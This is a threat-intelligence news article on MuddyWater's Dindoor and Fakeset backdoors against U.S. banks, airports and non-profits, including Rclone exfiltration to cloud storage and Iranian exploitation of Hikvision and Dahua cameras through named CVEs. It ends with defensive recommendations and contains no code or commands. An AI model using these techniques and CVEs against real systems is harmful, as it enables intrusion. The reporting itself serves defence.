Iran-Linked MuddyWater Hackers Target U.S. Networks With New Dindoor Backdoor

New research from Broadcom's Symantec and Carbon Black Threat Hunter Team has uncovered a sophisticated cyber espionage campaign by Iranian state-sponsored hackers targeting U.S. networks. The activity, attributed to the MuddyWater group (also known as Seedworm), represents a significant escalation in Iran's cyber operations amid the ongoing military conflict in the Middle East.

The campaign, which began in early February 2026, has seen Iranian hackers embed themselves within the networks of multiple U.S. companies, including banks, airports, non-profit organizations, and the Israeli arm of a software company. According to the security researchers, the software company targeted supplies the defense and aerospace industries and has operations in Israel, making it a strategic target for Iranian intelligence gathering.

New Dindoor Backdoor Leverages Modern Technologies

The attackers deployed a previously unknown backdoor dubbed "Dindoor" that leverages the Deno JavaScript runtime for execution. This represents a notable shift in Iranian hacking tactics, as the group moves toward more modern development frameworks and cloud-native technologies. The use of Deno suggests the attackers are evolving their toolset to blend in with legitimate development environments and evade traditional detection methods.

In addition to Dindoor, the researchers discovered attempts to exfiltrate data using the Rclone utility to a Wasabi cloud storage bucket. While it remains unclear whether this data theft was successful, the use of legitimate cloud storage services for exfiltration demonstrates the attackers' sophisticated approach to avoiding detection.

Multiple Attack Vectors and Malware Families

The campaign employed various malware families across different targets. At a U.S. airport and a non-profit organization, researchers found a separate Python backdoor called "Fakeset," which was downloaded from servers belonging to Backblaze, an American cloud storage and data backup company. The digital certificate used to sign Fakeset has also been used to sign Stagecomp and Darkcomp malware, both previously linked to MuddyWater operations.

"While this malware wasn't seen on the targeted networks, the use of the same certificates suggests the same actor -- namely Seedworm -- was behind the activity on the networks of the U.S. companies," Symantec and Carbon Black researchers stated in their report.

Escalating Iranian Cyber Operations

The timing of these attacks coincides with recent U.S. and Israeli military strikes on Iran, suggesting a direct retaliatory cyber response. The findings emerge against a backdrop of escalating military conflict, with Iranian cyber operations intensifying across multiple fronts.

Recent research from Check Point has uncovered the pro-Palestinian hacktivist group Handala Hack (also known as Void Manticore) routing operations through Starlink IP ranges to probe externally facing applications for misconfigurations and weak credentials. This demonstrates how Iranian-aligned groups are adapting their infrastructure to evade detection.

Camera Compromise as Strategic Intelligence Tool

Multiple Iran-nexus adversaries, including groups like Agrius (also known as Agonizing Serpens, Marshtreader, and Pink Sandstorm), have been observed scanning for vulnerable Hikvision cameras and video intercom solutions using known security flaws such as CVE-2017-7921 and CVE-2023-6895. The targeting has intensified in the wake of the current Middle East conflict.

Check Point researchers report that exploitation attempts against IP cameras have surged in Israel and Gulf countries, including the UAE, Qatar, Bahrain, and Kuwait, along with Lebanon and Cyprus. The activity has singled out cameras from Dahua and Hikvision, weaponizing vulnerabilities including CVE-2021-36260, CVE-2025-34067, and CVE-2021-33044.

"Taken together, these findings are consistent with the assessment that Iran, as part of its doctrine, leverages camera compromise for operational support and ongoing battle damage assessment (BDA) for missile operations, potentially in some cases prior to missile launches," Check Point stated. "As a result, tracking camera-targeting activity from specific, attributed infrastructures may serve as an early indicator of potential follow-on kinetic activity."

Broader Iranian Cyber Campaign

The U.S.-Israel conflict with Iran has prompted multiple cyber operations across various sectors. The Canadian Centre for Cyber Security (CCCS) has issued advisories warning that Iran will likely use its cyber apparatus to stage retaliatory attacks against critical infrastructure and conduct information operations to further the regime's interests.

Recent developments include:

• Israeli intelligence agencies reportedly hacked into Tehran's extensive traffic camera network for years to monitor the movements of bodyguards of Ayatollah Ali Khamenei and other top Iranian officials
• Iran's Islamic Revolutionary Guard Corps (IRGC) targeted Amazon's data center in Bahrain for the company's support of "enemy's military and intelligence activities"
• Active wiper campaigns are underway against Israeli energy, financial, government, and utilities sectors

Anomali reports that Iran's wiper arsenal includes over 15 families, including ZeroCleare, Meteor, Dustman, DEADWOOD, Apostle, BFG Agonizer, MultiLayer, and PartialWasher.

Sophisticated and Maturing Threat Actor

LevelBlue analysts note that Iranian state-sponsored APT groups like MuddyWater, Charming Kitten, OilRig, Elfin, and Fox Kitten "demonstrated clear signs of activation and rapid retooling, positioning themselves for retaliatory operations amid the escalating conflict."

UltraViolet Cyber emphasizes that "Iran's offensive cyber capability has matured into a durable instrument of state power used to support intelligence collection, regional influence, and strategic signaling during periods of geopolitical tension."

A defining feature of Iran's current cyber doctrine is its emphasis on identity and cloud control planes as the primary attack surface. Rather than prioritizing zero-day exploitation or highly novel malware at scale, Iranian operators tend to focus on repeatable access techniques such as credential theft, password spraying, and social engineering, followed by persistence through widely deployed enterprise services.

Recommended Security Measures

Organizations are advised to bolster their cybersecurity posture through several key measures:

• Strengthen monitoring capabilities to detect anomalous network activity
• Limit exposure to the internet by implementing proper network segmentation
• Disable remote access to operational technology (OT) systems where possible
• Enforce phishing-resistant multi-factor authentication (MFA)
• Implement comprehensive network segmentation
• Maintain offline backups to protect against wiper attacks
• Ensure all internet-facing applications, VPN gateways, and edge devices are up-to-date

CrowdStrike's Adam Meyers warns that "Western organizations should continue to remain on high-alert for potential cyber response as the conflict continues and activity may move beyond hacktivism and into destructive operations."

The sophistication and scale of these Iranian cyber operations demonstrate how state-sponsored hacking has become an integral component of modern geopolitical conflict, with critical infrastructure and corporate networks serving as battlegrounds in the digital domain.